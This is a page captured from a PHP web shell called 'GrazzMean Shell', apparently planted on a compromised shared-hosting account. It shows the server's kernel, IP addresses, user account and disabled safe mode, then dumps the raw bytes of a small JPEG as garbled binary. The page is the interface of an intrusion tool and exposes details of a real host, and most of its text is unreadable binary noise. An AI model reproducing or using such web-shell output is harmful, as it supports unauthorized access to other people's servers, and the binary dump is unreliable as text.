shell bypass 403

GrazzMean Shell

: /home/workvvfb/.trash/2020/09/ [ drwxr-xr-x ]
Uname: Linux premium264.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.3.22 [ PHP INFO ] PHP os: Linux
Server Ip: 69.57.162.13
Your Ip: 216.73.216.219
User: workvvfb (1129) | Group: workvvfb (1084)
Safe Mode: OFF
Disable Function:
NONE

name : hp-32x32.jpg
���JFIF��ExifII*��,http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.0 (Windows)" xmpMM:InstanceID="xmp.iid:D97BF40AF3A611EA8CD6D9A0FE1B07FC" xmpMM:DocumentID="xmp.did:D97BF40BF3A611EA8CD6D9A0FE1B07FC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D97BF408F3A611EA8CD6D9A0FE1B07FC" stRef:documentID="xmp.did:D97BF409F3A611EA8CD6D9A0FE1B07FC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��C				

!'"#%%%),($+!$%$��C				$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$��  ����0!1Qa�"Aq#4BRr��������*!1AaQq�"2�����?3�㙆E4Gj�{H��/d�J�oO��F0O����Rز�(�eb���+1�6�OD�~<�J}@�k ����l=u?�Lڑf�n�J�&J��N�zQ"�t�Y]�g�W0ʟ%��$�@S�V�*@���Q�ܫ�rseQ�SL\9v�u�P�<�߸�]i�YN5�C&,�f��;�cK�E�h��e��O������6;���Q$U�=qB>n�xf�
�\��+>$�n��������e����'l�c�-�g�M&,b��A	�Co�����Jz�v���N;l:�[/pq�OedFY(W`� �'���ᅫ�h�|�e{4���F���0�8�eM�Bq�(�o�Gs�S��EY�][�`��ϾQ�J|��:`tb��3��\�[���%��S�<|���[��R^Y�I�z�
&B��ҽpR�����yҜ�})T�#�Ҁ��'���4�g�VH�GF;y��rʮʿ���ޱZD�:]�.$?#�Gm�\HR��u?��[Թ�$��[*��[g=�e�[
�B�K�8���_]Y�4�ޏ�F�>F	^6���+�N�|�ӦQ����.�`��V�_"6* ��TR;�Ԟ���[�dpB
�=�"��iR��8�}���ƃ. !�;��<���
�5	M�p����9Y�� 9�K��w+���$�n-4��Q�R?��WmZ����������?��
© 2025 GrazzMean